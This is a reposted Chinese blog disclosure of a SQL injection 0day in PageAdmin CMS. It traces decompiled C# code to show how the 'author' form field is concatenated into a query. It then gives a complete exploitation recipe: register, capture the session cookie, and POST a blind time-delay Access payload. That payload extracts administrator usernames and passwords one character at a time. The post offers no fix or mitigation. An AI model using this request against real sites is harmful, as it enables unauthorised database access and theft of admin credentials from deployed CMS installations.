IT博客汇 | PageAdmin CMS SQLInjection 0DAY

PageAdmin CMS SQLInjection 0DAY

没穿底裤发表于 2017-01-25 14:34:39

漏洞出现在:
class ： mem_issue

protected void Page_Load(object sender, EventArgs e) //页面加载事件
    {
      //method_15 这里判断变量  A-Z 0-9 method_16转换为int 成功返回TRUE  前面没什么好看的 看下面 this.method_4();
      if ((!this.method_15(this.Request.QueryString["table"]) || !this.method_16(this.Request.QueryString["detailid"]) ? 0 : (this.method_16(this.Request.QueryString["workid"]) ? 1 : 0)) == 0)
      {
        this.Response.Write("<script type='text/javascript'>alert('参数错误!');parent.CloseDialog()</script>");
        this.Response.End();
      }
      if (this.Request.QueryString["from"] == "master")
      {
        Master_Valicate masterValicate = new Master_Valicate();
        masterValicate.Master_Check();
        this.string_1 = masterValicate._UserName;
        this.int_1 = int.Parse(this.Request.Cookies["SiteId"].Value);
      }
      else
      {
        if (this.Request.Cookies["Member"] == null)
        {
          this.Response.Write("<script type='text/javascript'>alert('未登录或登录失效!');parent.CloseDialog()</script>");
          this.Response.End();
        }
        Member_Valicate memberValicate = new Member_Valicate();
        memberValicate.Member_Check();
        this.string_1 = memberValicate._UserName;
        if ((!this.method_16(this.Request.QueryString["s"]) ? 1 : (!this.method_15(this.Request.QueryString["table"]) ? 1 : 0)) == 0)
        {
          this.int_1 = int.Parse(this.Request.QueryString["s"]);
        }
        else
        {
          this.int_1 = 0;
          this.Response.Write("<script type='text/javascript'>alert('参数错误!');parent.CloseDialog()</script>");
          this.Response.End();
        }
      }
      this.string_0 = this.Request.QueryString["table"];
      this.int_0 = int.Parse(this.Request.QueryString["detailid"]);
      this.Work_Id = int.Parse(this.Request.QueryString["workid"]);
      if (this.Page.IsPostBack)
        return;
      this.oleDbConnection_0 = new Conn().OleDbConn();
      this.oleDbConnection_0.Open();
      if (this.Request.Form["post"] == "update")
      {
        this.method_4();//这里提交 post update 跟进
      }
      else
      {
        this.method_12();
        this.method_11();
        this.method_10();
      }
      this.oleDbConnection_0.Close();
    }

method_4 :

private void method_4()
    {
///如果用户是 admin 或者 提交的current_username 和当前string_1 一样  string_1 是你登录的SESSION 所以需要登录
      if ((!(this.string_1 != this.Request.Form["current_username"]) ? 1 : (!(this.string_1 != "admin") ? 1 : 0)) == 0)
      {
        this.Response.Write("<script type='text/javascript'>alert('此步骤您无权限操作!');</script>");
        this.Response.End();
      }
      this.author = this.Request.Form["author"]; //[color=Red]这里注意 直接带进来了。[/color]
      this.DataTitle = this.Request.Form["current_title"];
      string str = this.DataTitle;
      if (str.Length > 50)
        str = str.Substring(0, 50) + "...";
      string string_2 = this.Request.Form["act"];
      Log log = new Log();
      switch (string_2)
      {
        case "pass":
          this.method_0(string_2);
          this.method_2(string_2);
          log.Save(this.int_1, 1, "issue", 1, this.string_1, "签发信息：通过(标题：" + str + ")");
          break;
        case "rework":
          this.method_0(string_2);
          this.method_2(string_2);
          log.Save(this.int_1, 1, "issue", 1, this.string_1, "签发信息：退回(标题：" + str + ")");
          break;
        case "delete":
          this.method_3();
          log.Save(this.int_1, 1, "issue", 1, this.string_1, "签发信息：删除信息(标题：" + str + ")");
          break;
      }
      if (this.Request.Form["sendmsg"] == "1")
        this.method_6();
      if (this.Request.Form["sendmail"] == "1")
        this.method_7(); //----------------这里POST 提交 SENDMAIL == "1"  跟进
      this.int_3 = 1;
      if ((!(this.Request.Form["is_static"] == "1") || !(this.Request.Form["data_html"] == "2") ? 1 : (this.int_2 != 1 ? 1 : 0)) == 0)
        this.method_5();
      this.oleDbConnection_0.Close();
      this.Response.Write("<script type='text/javascript'>parent.postover('" + string_2 + "'," + (object) this.int_3 + ")</script>");
      this.Response.End();
    }

this.method_7 :

  private void method_7()
    {
      if (!(this.author != ""))//。。。。。
        return;
//发送消息 调用了this.method_8() 继续跟
      new SendMessage(this.int_1).SendEmail(this.method_8(), "", "", this.Request.Form["fb_title"], this.Request.Form["reply"]);
    }

this.method_8:

private string method_8()
    {
      string str = "";//----------------OK这里直接进入SQL语句，没任何妨碍，但是没有回显。
      OleDbDataReader oleDbDataReader = new OleDbCommand("select email from pa_member where username='" + this.author + "'", this.oleDbConnection_0).ExecuteReader();
      if (oleDbDataReader.Read())
        str = oleDbDataReader["email"].ToString();
      oleDbDataReader.Close();
      return str;
    }

证明

利用
SQL SERVER 都无所谓回显不会显各种语句可以搞。
说说 ACCESS版本的
ACCESS 没有延迟的函数，但后来找了资料,也是可以注入延迟的

1.先注册后，登录。
2.burp suite 抓好COOKIE
3.提交 Payload

POST /e/member/state.aspx?table=pa_member&detailid=2&workid=1&s=1
Host: localhost:59361
Content-Type: application/x-www-form-urlencoded
Cookie: administrator=admin; ASP.NET_SessionId=1yal5a452m0a0lbwr5dqmqj3; tongji=1; referer=; site=1; Member=UID=336&Valicate=11b538897eb106123c9971911431341875fdc152

post=update&current_title=111&current_username=aaaa2222&sendmail=1&author=' or (select top 1 asc(mid(UserName+UserPassword,1,1)) from 
pa_member)=97 and (SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6, MSysAccessObjects AS T7,MSysAccessObjects AS T8,MSysAccessObjects AS T9,MSysAccessObjects AS T10,MSysAccessObjects AS T11,MSysAccessObjects AS T12)>0  and ''='

提交条件假

提交条件真